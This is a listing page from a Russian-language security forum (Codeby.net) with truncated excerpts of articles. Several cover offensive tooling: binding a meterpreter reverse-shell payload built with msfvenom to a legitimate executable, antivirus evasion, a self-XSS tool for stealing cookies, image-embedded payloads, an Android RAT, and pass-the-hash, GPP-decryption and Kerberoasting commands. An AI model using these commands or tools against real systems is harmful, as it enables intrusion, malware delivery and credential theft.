Форум информационной безопасности - Codeby.net

Статья Джоиним зловред и легитимный файл между собой

  • 5 571
  • 19
Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод:
Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Статья исключительно в ознакомительных целях.
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

git clone https://github.com/r00t-3xp10it/trojanizer.git

Далее создаем пейлоад, используя msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

1571250825094.png


[COLOR=rgb(251...

Статья Обход антивируса с помощью Метасплоита

  • 12 872
  • 15
Первоисточник:
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Метерпретер - это очень мощный по функционалу и основной payload для Metasploit.
  • В статье рассматривается способ обхода антивируса при создании нагрузки в метасплоите.
1571225815575.png


Дисклеймер: Эта статья создана исключительно в ознакомительных целях. Автор не одобряет и не поощряет использование информации в противозаконных целях. Всю ответственность за твои действия несешь только ты.

Все инструменты, обсуждаемые в этом посте, являются общедоступными. В процессе я объясню обход IPS ((Intrusion Prevention System) системы...

Soft self-xss или как ещё заполучить cookie

  • 5 905
  • 17
Вновь всех приветствую.
Ещё одна короткая заметка будет о том,как ещё можно выкрасть IP и Cookie жертвы.

Поможет нам в этом автор утилиты thelinuxchoice.
Он же автор таких инструментов как ShellPhish и Blackeye

Основой способа является ,опять-таки,социальная инженерия и сервис коротких ссылок Bitly.
Атака такого плана была задумана над получением контроля web-счетов жертв путём их обмана.
А именно,за счёт принуждения перехода по ссылке с вредоносным кодом,который выполняется в браузере.
Злоумышленник получает данные IP-адреса,User-Agent и Cookie жертвы.

Информация предоcтавлена исключительно для ознакомления.
Автор утилиты,автор обзора и Администрация ресурса напоминают об ответственности в случае незаконного применения рассматриваемого инструмента.


Установка:
Код:
# git clone https://github.com/thelinuxchoice/self-xss.git
# cd self-xss
# bash self-xss.sh

В утилиту встроена функция редиректа на тот ресурс,который требуется...

Soft Pixload: вредоносный скрипт в изображении

  • 7 419
  • 5
Добрый день,Уважаемые Форумчане и Друзья.
Когда-то стали известны способы размещения вредоносного кода в изображении.
Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом.

В основном,это касалось файлов BMP,при этом,2 первых байта представляли 16-ричное представление символов ВМ в изображении ВМP.
Далее,4 байта отвечают за размер,затем 4 нулевых байта и байты,отвечающие за смещение данных.
При выполнении техники Polyglot,контролируется размер изображения,а 16-ричные символы представляются так,чтобы компьютерами интерпретировались иначе.
Т.е.,чтобы выполнялись как код.

Соответственно,появился генератор полезной нагрузки Pixload,который создал Alexandr Savca (chinarulezzz).
И который представляю Вашему вниманию.
Pixload умеет сгенерировать нагрузку в файлах BMP,GIF,JPG и PNG .
Работает он как с дефолтными файлами,которые прилагаются в его директории,так и может начинять небольшие произвольные файлы соответствующего...

Статья Свой RAT для Android - Часть 3

  • 3 175
  • 2
Содержание статьи:
  1. Приветствие
  2. Правка проекта
  3. Делаем крутой парсер функций вместо гавнокода
  4. Бонус
    1. Получение звонков
    2. Получение сообщений
  5. Заключение
1. Приветствие
1. Ссылка на первую статью
2. Ссылка на вторую статью

Ну что же, это третья статья, так что всем снова привет и добрый вечер. Жаль что у второй статьи на данный момент в 5 раз меньше просмотров чем у первой (1к против ~200), но надеюсь в дальнейшем темой заинтересуется больше людей т.к. то что будет в этой статье не находил нигде.
Если именно Вы вдруг находили часть материала из статьи в интернете, не стоит ругаться или говорить что автор обманул Вас, т.к. все равно...

Статья Записки пентестера

  • 395
  • 5
Доброе %CURRENT_TIME%. За погоней к OSCP я тут собираю различные материалы и заметочки. Решил некоторыми из них поделиться.

SMB:
  • smbclient -L //10.10.10.100
  • smbclient -N \\\\10.10.10.123\\general
  • smbmap -H 10.10.10.107 -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' --download alice/my_private_key.ppk - скачать удаленно файл через pass-the-hash
Group Policy Hijacking:
Код:
sudo apt-get install cifs-utils
mkdir /mnt/Replication
Smbmap -R Replication -H <host> -A Groups.xml -q
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o username=,password=,domain=active.htb
grep -R password /mnt/Replication/
gpp-decrypt <pass-gpppolicy>

Kerberoasting:
  • ldapsearch -x -h <HOST> -p 389 -D '<USER>' -w '<PASS>' -b "dc=active,dc=htb" -s sub...

Статья Entry Point – дело о пропавшем индексе (часть 1)

  • 6 198
  • 2
Термин EntryPoint знаком каждому программисту – это адрес точки входа в программу, т.е. первой инструкции исполняемого кода. Компиляторы прошивают этот адрес в РЕ-заголовок по смещению 28h, а системный "загрузчик образов" потом считывает его от туда, и передаёт на него управление. Такому алгоритму следуют все LDR-загрузчики, начиная с Win98 и до наших дней. Сам загрузчик оформлен в виде функции LdrpInitializeProcess() из библиотеки Ntdll.dll.

В данной статье рассмотрим несколько способов реализации фиктивных точек EntryPoint, что позволит защитить наши программы от взлома и отладки. Например зачем выставлять на показ процедуру проверки введённого пароля, или какой-нибудь авторской техники? До тех пор пока она не станет достоянием общественности, мы сможем использовать её в своих программах снова и снова. Но как-только корабль даст течь, придётся латать дыры, на что нужно время...

Статья Как установить Kali Linux на Raspberry Pi

  • 4 216
  • 0
Raspberry Pi — это очень простой дешёвый ARM компьютер. Не смотря на то, что его спецификация звёзд не хватает, это отличный вариант для крошечной Linux системы и он может делать гораздо большее, чем быть медиа компьютером.

По умолчанию, образ Kali Linux Raspberry Pi хорошо отлажен с минимумом инструментов, схожий со всеми другими образами для ARM. Если вы хотите обновить инсталляцию до стандартной настольной инсталляции, вы можете включить дополнительные инструменты, установив метапакет kali-linux-full. Для большей информации по метапакету, пожалуйста обратитесь к нашей .

Размещение Kali на Raspberry Pi — простой способ
Если всё, что вы хотите сделать, это установить Kali на вашем Raspberry Pi, проделайте эти инструкции:
  1. Возьмите хорошую быструю на 8 GB (или более) SD карту. Крайне рекомендуется Class 10.
  2. Загрузите образ Kali Linux...

Статья Установка драйверов NVIDIA на Kali

  • 15 782
  • 5
Если у вас Kali Linux установлена в виртуальной машине, то она никогда не увидит вашу видеокарту. Т.е. эта инструкция не применима для ОС в виртуальной машине.

Этот документ объясняет, как задействовать видео железо от NVIDIA и установить драйверы на систему Kali Linux. Первый шаг, это полностью обновите вашу систему Kali Linux и убедитесь, что у вас установлены заголовки ядра (kernel headers).
Bash:
apt-get update
apt-get dist-upgrade
apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms


Следующий шаг — это отключение драйвера nouveau. — это опен-сорсный проект драйверов NVIDIA, однако ему не хватает 3D ускорения графики, которое необходимо для запуска инструментов Cuda pentest.
Bash:
sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Как только система снова загрузится, вы можете увидеть экран...

Статья Как я смог взломать сайт по гайду на Codeby

  • 21 049
  • 10
Всем привет!

Эта статья посвящена форуму codeby.net, в частности статьям пользователя explorer. Напомню, периодически я зарабатываю тем, что чищу сайты после взлома.

Обратился очередной клиент. Диагноз - хроническое изменение содержимого index.php. Анализ файлов показал, что на этот раз это какая-то неизвестная самописная CMS на PHP. После непродолжительных поисков нашел страницу, где используются GET-запросы. Звезды совпали и я сразу вспомнил статьи вышеупомянутого пользователя и недавний SQL-challenge, в котором я безуспешно участвовал =)

По стандарту, пробуем кавычку и получаем следующее:

2.png


Уже интересно. Попробуем запрос без кавычки и сразу (чего мелочиться то) с попыткой определить количество столбцов...